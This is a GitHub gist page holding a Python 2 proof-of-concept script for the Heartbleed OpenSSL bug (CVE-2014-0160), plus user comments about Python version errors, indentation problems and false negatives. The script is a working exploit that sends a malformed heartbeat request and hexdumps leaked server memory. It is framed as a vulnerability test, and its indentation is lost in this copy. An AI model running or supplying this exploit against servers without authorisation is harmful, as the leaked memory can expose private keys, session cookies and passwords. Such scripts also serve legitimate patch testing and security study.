Create a gist now

Instantly share code, notes, and snippets.

@sh1n0b1 /ssltest.py
Created Apr 8, 2014

What would you like to do?
Download ZIP
Python Heartbleed (CVE-2014-0160) Proof of Concept
Raw
ssltest.py
#!/usr/bin/python
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser
options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
def h2bin(x):
return x.replace(' ', '').replace('\n', '').decode('hex')
hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')
hb = h2bin('''
18 03 02 00 03
01 40 00
''')
def hexdump(s):
for b in xrange(0, len(s), 16):
lin = [c for c in s[b : b + 16]]
hxdat = ' '.join('%02X' % ord(c) for c in lin)
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
print ' %04x: %-48s %s' % (b, hxdat, pdat)
print
def recvall(s, length, timeout=5):
endtime = time.time() + timeout
rdata = ''
remain = length
while remain > 0:
rtime = endtime - time.time()
if rtime < 0:
return None
r, w, e = select.select([s], [], [], 5)
if s in r:
data = s.recv(remain)
# EOF?
if not data:
return None
rdata += data
remain -= len(data)
return rdata
def recvmsg(s):
hdr = recvall(s, 5)
if hdr is None:
print 'Unexpected EOF receiving record header - server closed connection'
return None, None, None
typ, ver, ln = struct.unpack('>BHH', hdr)
pay = recvall(s, ln, 10)
if pay is None:
print 'Unexpected EOF receiving record payload - server closed connection'
return None, None, None
print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
return typ, ver, pay
def hit_hb(s):
s.send(hb)
while True:
typ, ver, pay = recvmsg(s)
if typ is None:
print 'No heartbeat response received, server likely not vulnerable'
return False
if typ == 24:
print 'Received heartbeat response:'
hexdump(pay)
if len(pay) > 3:
print 'WARNING: server returned more data than it should - server is vulnerable!'
else:
print 'Server processed malformed heartbeat, but did not return any extra data.'
return True
if typ == 21:
print 'Received alert:'
hexdump(pay)
print 'Server returned error, likely not vulnerable'
return False
def main():
opts, args = options.parse_args()
if len(args) < 1:
options.print_help()
return
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Connecting...'
sys.stdout.flush()
s.connect((args[0], opts.port))
print 'Sending Client Hello...'
sys.stdout.flush()
s.send(hello)
print 'Waiting for Server Hello...'
sys.stdout.flush()
while True:
typ, ver, pay = recvmsg(s)
if typ == None:
print 'Server closed connection without sending Server Hello.'
return
# Look for server hello done message.
if typ == 22 and ord(pay[0]) == 0x0E:
break
print 'Sending heartbeat request...'
sys.stdout.flush()
s.send(hb)
hit_hb(s)
if __name__ == '__main__':
main()
@demonclan

This comment has been minimized.

Show comment Hide comment
@demonclan

demonclan Apr 8, 2014

py 3.4 Syntax Error

demonclan commented Apr 8, 2014

py 3.4 Syntax Error
@gdude2002

This comment has been minimized.

Show comment Hide comment
@gdude2002

gdude2002 Apr 8, 2014

This is clearly a snippet for use with Python 2.

gdude2002 commented Apr 8, 2014

This is clearly a snippet for use with Python 2.
@xfors

This comment has been minimized.

Show comment Hide comment
@xfors

xfors Apr 8, 2014

File "./ssltest.py", line 47
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)

python-2.4.3-56.el5

xfors commented Apr 8, 2014

File "./ssltest.py", line 47
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)

python-2.4.3-56.el5
@smowton

This comment has been minimized.

Show comment Hide comment
@smowton

smowton Apr 8, 2014

Quote the server's TLS version back at it in the HB message, otherwise you'll get false negatives when the exchange goes:

Client: Hello TLS 1.1
Server: Hello TLS 1.0
Client: HB TLS 1.1
Server: Bad version

smowton commented Apr 8, 2014

Quote the server's TLS version back at it in the HB message, otherwise you'll get false negatives when the exchange goes:

Client: Hello TLS 1.1
Server: Hello TLS 1.0
Client: HB TLS 1.1
Server: Bad version
@martinseener

This comment has been minimized.

Show comment Hide comment
@martinseener

martinseener Apr 8, 2014

Can you add support for UDP SSL Tests (for use in some SSL-VPN configs)?

martinseener commented Apr 8, 2014

Can you add support for UDP SSL Tests (for use in some SSL-VPN configs)?
@jumping

This comment has been minimized.

Show comment Hide comment
@jumping

jumping Apr 9, 2014

@xfors Need python2.6 to run this script.

jumping commented Apr 9, 2014

@xfors Need python2.6 to run this script.
@Dusseltier

This comment has been minimized.

Show comment Hide comment
@Dusseltier

Dusseltier Apr 10, 2014

File "./ssltest.py", line 18
return x.replace(' ', '').replace('\n', '').decode('hex')
^
IndentationError: expected an indented block

Python 2.7.3 (default, Mar 13 2014, 11:03:55)
[GCC 4.7.2] on linux2

So PLEASE use the 'RAW' Option for Copy&Paste :)

Dusseltier commented Apr 10, 2014

File "./ssltest.py", line 18
return x.replace(' ', '').replace('\n', '').decode('hex')
^
IndentationError: expected an indented block

Python 2.7.3 (default, Mar 13 2014, 11:03:55)
[GCC 4.7.2] on linux2

So PLEASE use the 'RAW' Option for Copy&Paste :)
@ninaboss56

This comment has been minimized.

Show comment Hide comment
@ninaboss56

ninaboss56 Apr 10, 2014

When the program results are this what does it mean?
Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0301, length = 2668
Unexpected EOF receiving record header - server closed connection
Server closed connection without sending Server Hello.

ninaboss56 commented Apr 10, 2014

When the program results are this what does it mean?
Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0301, length = 2668
Unexpected EOF receiving record header - server closed connection
Server closed connection without sending Server Hello.
@ericrange

This comment has been minimized.

Show comment Hide comment
@ericrange

ericrange Feb 10, 2017

is there a python 3 version of it?

ericrange commented Feb 10, 2017

is there a python 3 version of it?
@pyking

This comment has been minimized.

Show comment Hide comment
@pyking

pyking Jul 28, 2017

File "Heartbleed.py", line 52
lin = [c for c in s[b : b + 16]]
^
IndentationError: expected an indented block

pyking commented Jul 28, 2017

File "Heartbleed.py", line 52
lin = [c for c in s[b : b + 16]]
^
IndentationError: expected an indented block
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment